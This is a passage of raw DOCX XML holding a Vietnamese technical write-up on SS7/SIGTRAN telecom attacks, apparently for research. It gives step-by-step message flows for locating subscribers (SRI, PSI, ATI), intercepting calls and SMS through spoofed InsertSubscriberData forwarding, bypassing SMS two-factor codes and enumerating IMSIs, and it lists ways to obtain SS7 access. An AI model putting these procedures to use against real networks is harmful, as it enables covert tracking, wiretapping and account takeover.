        <w:t xml:space="preserve">├────────────────────────────────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MTP2 (Message Transfer Part Level 2)                   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ITU-T Q.703: Kiểm soát liên kết tín hiệu              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────────────────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MTP1 (Physical Layer)                                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  64 kbps E1 links hoặc SIGTRAN (SS7 over IP/SCTP)      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└────────────────────────────────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Triển khai hiện đại qua IP:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌────────────────────┐    ┌────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│      MAP / TCAP    │    │     MAP / TCAP              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────┤    ├────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    SCCP / M3UA     │    │    SCCP / M3UA              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────┤    ├────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    SCTP            │◄──►│    SCTP                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────┤    ├────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    IP              │    │    IP                       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└────────────────────┘    └────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   Attacker SGW                 Mạng SS7 global</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIGTRAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(SS7 over IP) là cầu nối quan trọng: kể từ khi các nhà mạng chuyển core network sang IP, SS7 được đóng gói trong M3UA/SCTP/IP, cho phép kết nối SS7 qua Internet nếu có tài khoản STP (Signal Transfer Point).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="X5fd955759d85554830c6f8799830a7a785bb4fd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Cơ Chế Tin Tưởng Tuyệt Đối (Implicit Trust)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bất kỳ thực thể nào trong mạng SS7 global đều có thể:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Gửi lệnh MAP đến bất kỳ HLR/MSC/SMSC nào trên thế giới</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Giả mạo GT (Global Title – địa chỉ SS7) của bất kỳ mạng nào</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Không có cơ chế xác thực chữ ký hoặc certificate ở cấp giao thức</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Điểm truy cập vào SS7 (Attack Entry Points):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Mua dịch vụ từ MVNO (Mobile Virtual Network Operator) có cấp quyền SS7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Tấn công/xâm nhập vào hệ thống của một nhà mạng nhỏ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Mua quyền truy cập STP từ nhà cung cấp dịch vụ signalling (đã ghi nhận tại một số quốc gia)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Khai thác điểm kết nối IPX (IP eXchange) liên mạng</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="21" w:name="phân-loại-chi-tiết-các-tấn-công-map"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Phân Loại Chi Tiết Các Tấn Công MAP</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="17" w:name="location-tracking"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.1 Location Tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phương thức 1: SRI + PSI (chính xác nhất)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker                HLR mục tiêu              MSC/VLR hiện tại</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                        │                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── SRI (MSISDN) ────────►│                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄── SRI Response ────────│                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │    (IMSI + MSC address) │                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                        │                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── PSI (IMSI) ──────────────────────────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄── PSI Response ────────────────────────────────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │    (Cell-ID + LAC + IMEI + subscriber state)        │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả: Cell-ID + LAC → tra cứu cơ sở dữ liệu OpenCelliD/Google Maps API → tọa độ địa lý</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phương thức 2: ATI (Any Time Interrogation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lệnh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AnyTimeInterrogation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ATI) trong MAP được thiết kế cho network management, nhưng cung cấp thông tin vị trí trực tiếp:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker → ATI(MSISDN, "location info requested") → HLR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HLR → ATI Response:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Current VLR address  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Cell Global Identity (MCC+MNC+LAC+CellID)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Age of Location Information (giây từ lần cập nhật cuối)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - IMEI (nếu mạng lưu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Subscriber State: assumedIdle / camelBusy / notProvidableFromVLR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phương thức 3: SRI-SM (theo dõi qua SMS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker → SRI-SM(MSISDN) → HLR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HLR → SRI-SM Response:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - MSC/SGSN address (đang phục vụ thuê bao)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Xác nhận thuê bao đang active, suy ra vùng phủ sóng hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Độ chính xác theo môi trường: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Môi trường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cell radius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Độ chính xác vị trí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nội thành dày đặc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">50–200m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">±100m</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ngoại ô</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">500m–2km</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">±1km</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nông thôn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5–30km</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">±15km</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vùng sâu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;30km</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">±30km</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="call-interception-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.2 Call Interception Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để chặn cuộc gọi, attacker cần:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Dùng SRI lấy IMSI + địa chỉ MSC hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Gửi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">InsertSubscriberData</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ISD) đến VLR, ghi đè hồ sơ dịch vụ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISD payload:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - IMSI: [target]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Basic service: teleservice 11 (telephony)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Call forwarding data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      - CFU active: TRUE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      - Forwarded-to-number: [attacker MSRN hoặc gateway]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - CAMEL subscription info (nếu mạng hỗ trợ O-CSI):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      - Service key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      - gsmSCF address: [attacker SCP]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Khi cuộc gọi đến, MSC đọc hồ sơ ISD → chuyển hướng đến gateway attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Gateway attacker relay cuộc gọi sang điện thoại thật, đồng thời fork audio stream để ghi âm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Caller ──────► MSC ──ISD CFU──► Attacker Gateway ──relay──► Target Phone</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   [Audio Fork]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   [Recording]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="sms-interception"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.3 SMS Interception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: SRI-SM → lấy SMSC address + IMSI của mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: Đăng ký SMSC giả (hoặc forward SMSC address)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 3: ISD → ghi đè MO/MT SMS routing trong VLR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 4: SMS đến/đi đi qua attacker trước khi đến đích</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ứng dụng thực tế nghiên cứu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Vượt qua 2FA dựa trên SMS — attacker nhận OTP trước nạn nhân, sau đó relay SMS đến nạn nhân để tránh bị phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="imsi-enumeration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4.4 IMSI Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mạng SS7 cho phép brute-force IMSI từ MSISDN:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SRI(MSISDN="+84901234567") → IMSI response</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Lặp qua danh sách MSISDN, thu thập IMSI database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IMSI sau đó được dùng trong các tấn công nâng cao (PSI, ATI trực tiếp qua IMSI).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="đầu-vào-input-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Đầu Vào (Input) Chi Tiết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Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cách thu thập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SS7 access point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kết nối STP/SGW hợp lệ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mua từ MVNO hoặc SS7 hub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">GT của attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Địa chỉ SS7 giả mạo là HLR/MSC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
